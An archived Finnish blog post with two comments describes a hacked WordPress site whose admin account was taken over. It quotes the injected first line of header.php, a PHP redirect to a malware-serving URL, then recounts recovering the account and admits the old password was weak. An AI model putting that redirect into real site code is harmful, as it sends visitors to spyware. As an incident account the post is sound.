Arkistomatskua
Otathan huomioon, että tämä on yli 16 vuotta vanha artikkeli, joten sisältö ei ole välttämättä ihan ajan tasalla. Olin artikkelin kirjoittamishetkellä 20-vuotias.
Tänä aamuna tajusin että rollemaa.fiin WP oli mystisesti mutatoitunut eilisiltapäivästä. Sivu oli täynnä virheilmoituksia ja header.php:n ensimmäinen rivi sisälsi seuraavan pätkän (älä mene tuohon osoitteeseen, se sisältää spywarea):
<?
header(”Location: http://scanner.malwarealarms.com/5/?advid=2241”);
?>
Admin-tunnukset oli ryöstetty ja sähköpostiosoite muutettu lol@lol.ru -osoitteeksi. Menin phpMyAdminiin ja pengoin wp_usersin alta adminin ja vaihdoin sähköpostiosoitteen, jolloin sain salasanan vaihdettua. Myönnän että adminsalasanani oli aivan liian helppo, alkuajoilla keksitty. Nyt se on 14-kirjaiminen (sama kuin työadminkoneeni salasana, isoja ja pieniä kirjaimia ja numeroita sekaisin, muistan sen hyvin).
Liekö sitten kyseessä nykyisen WordPressin haavoittuvaisuus vai salasanan helppous… voisinpa tämän rohkaisemana päivittää WP:ni uusimpaan. Ilkeää.
Piditkö tekstistä? Tarjoa kahvit!
DorianG
auts :(
Gocom
Ouh :( Voihan olla mahdollista että palvelinkin on hakkeroitu, mutta toisaalta kuulostaa enemmän taas noilta konffi-exploit-scripteiltä.
No eihän WP ole niin hirveän turvallinen softa kuitenkaan, jos mietitään että jopa script kiddiet pääsee sivuston kaatamaan ”hetkessä” hakuammulta scripteillään.
Mutta onhan muissakin blogisoftissa omat aukkonsa.
Kuinka monta merkkiä oli alkuperäisessä salasanassa? Jos haluamme nussia pilkkua voimme laskea sen muodostamisen maksimiajan ;)